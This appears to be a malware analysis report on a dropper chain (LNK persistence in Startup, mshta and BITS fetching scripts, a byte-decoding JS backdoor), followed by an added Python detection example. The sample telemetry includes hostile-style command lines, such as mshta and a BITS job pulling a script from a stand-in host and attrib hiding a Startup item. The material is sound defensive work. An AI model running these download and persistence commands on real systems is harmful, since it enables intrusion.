The initial vector is an SFX executable that drops an LNK file for persistence, a VBS file, and a DOCX file used as a decoy for the victim.
We can also note the multiple possibilities and options available for pushing the persistence.
This executes the VBS file, which pushes the persistence into the Startup menu, hides it by changing its attributes, and launches the persistence (the LNK file).
This downloads the VB script and executes it through an mshta call.
In the VB code, we can observe that it uses BITS functionality to download, through a job, the JS script to execute on the victim. Secondly, it checks the system architecture, runs wscript from the correct path, and pushes the window off the screen.
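The stages described above (hidden persistence item in the Startup folder, mshta fetching a remote script, a BITS job pulling a script payload, and an architecture-specific wscript re-launch) each leave a recognizable trace in host telemetry. As an added example that is not the report's own code, the following Python runs simple detection rules for those stages over constructed sample events; the Event fields, the sample paths, the file names and the example.invalid host are assumptions for illustration, not data from this campaign.

```python
# Added example (not from the report): detection rules for the stages described
# above, run over constructed Windows telemetry. Field names, paths and hosts
# are assumptions for illustration.
import re
from dataclasses import dataclass

# Per-user Startup folder, where the report says the VBS pushes the LNK persistence.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|vbs|vbe|hta|wsf)(\?|$)", re.IGNORECASE)


@dataclass
class Event:
    kind: str           # "process" (process creation) or "bits" (BITS transfer job started)
    image: str = ""     # path of the new process (process events)
    parent: str = ""    # path of the parent process (process events)
    cmdline: str = ""   # full command line (process events)
    url: str = ""       # remote URL of the transfer (bits events)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(e: Event) -> list[str]:
    """Return the stage labels a single event matches (possibly none)."""
    hits = []
    if e.kind == "process":
        img, parent, cmd = basename(e.image), basename(e.parent), e.cmdline
        # Stage: persistence item in Startup hidden by changing its attributes
        if img == "attrib.exe" and "+h" in cmd.lower() and STARTUP_RE.search(cmd):
            hits.append("hide_startup_item")
        # Stage: a script host running a script that lives in the Startup folder
        if img in SCRIPT_HOSTS and STARTUP_RE.search(cmd):
            hits.append("script_from_startup")
        # Stage: mshta pulling a remote script instead of a local .hta
        if img == "mshta.exe" and URL_RE.search(cmd):
            hits.append("mshta_remote")
        # Stage: wscript re-launched by another script host (32/64-bit path selection)
        if img in SCRIPT_HOSTS and parent in SCRIPT_HOSTS:
            hits.append("script_host_relaunch")
    elif e.kind == "bits" and SCRIPT_EXT_RE.search(e.url):
        # Stage: BITS job whose remote file is a script payload
        hits.append("bits_script_download")
    return hits


# Kill-chain order used to sort the summary
STAGE_ORDER = ["hide_startup_item", "script_from_startup", "mshta_remote",
               "bits_script_download", "script_host_relaunch"]


def detect(events: list[Event]) -> list[str]:
    """Run every event through classify() and list the distinct stages seen, in chain order."""
    seen = []
    for e in events:
        for label in classify(e):
            if label not in seen:
                seen.append(label)
    return sorted(seen, key=STAGE_ORDER.index)


def chain_matched(events: list[Event], minimum: int = 3) -> bool:
    """True when enough distinct stages are present to treat the host as matching the chain."""
    return len(detect(events)) >= minimum


# Constructed sample telemetry (not real data): one benign event plus four stage events.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\attrib.exe", r"C:\Windows\System32\wscript.exe",
          r'attrib +h +s "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"'),
    Event("process", r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          "mshta http://example.invalid/stage2"),
    Event("bits", url="http://example.invalid/payload.js"),
    Event("process", r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\System32\wscript.exe",
          r'wscript.exe /b "C:\Users\victim\AppData\Local\Temp\payload.js"'),
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for stage in detect(SAMPLE_EVENTS):
        print("stage seen:", stage)
    print("chain matched:", chain_matched(SAMPLE_EVENTS))
```

Each rule on its own is noisy (administrators do run attrib, and mshta has legitimate uses), which is why `chain_matched` requires several distinct stages on the same host before raising the finding; the BITS rule assumes the transfer log exposes the remote URL, which is the case for the BITS-Client operational log but is modeled here with a constructed record.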
JS Backdoor
We can observe that it uses a function to decode the commands from an array of bytes.
To decode the strings, we use the following function, which is the one the backdoor itself uses to decode its commands.
The encoded commands can now be replaced with their decoded form.
Cyber kill chain
The process graph summarizes the cyber kill chain used by the attacker.
Cyber Threat Intel
References MITRE ATT&CK Matrix
List of all the references mapped to the MITRE ATT&CK Matrix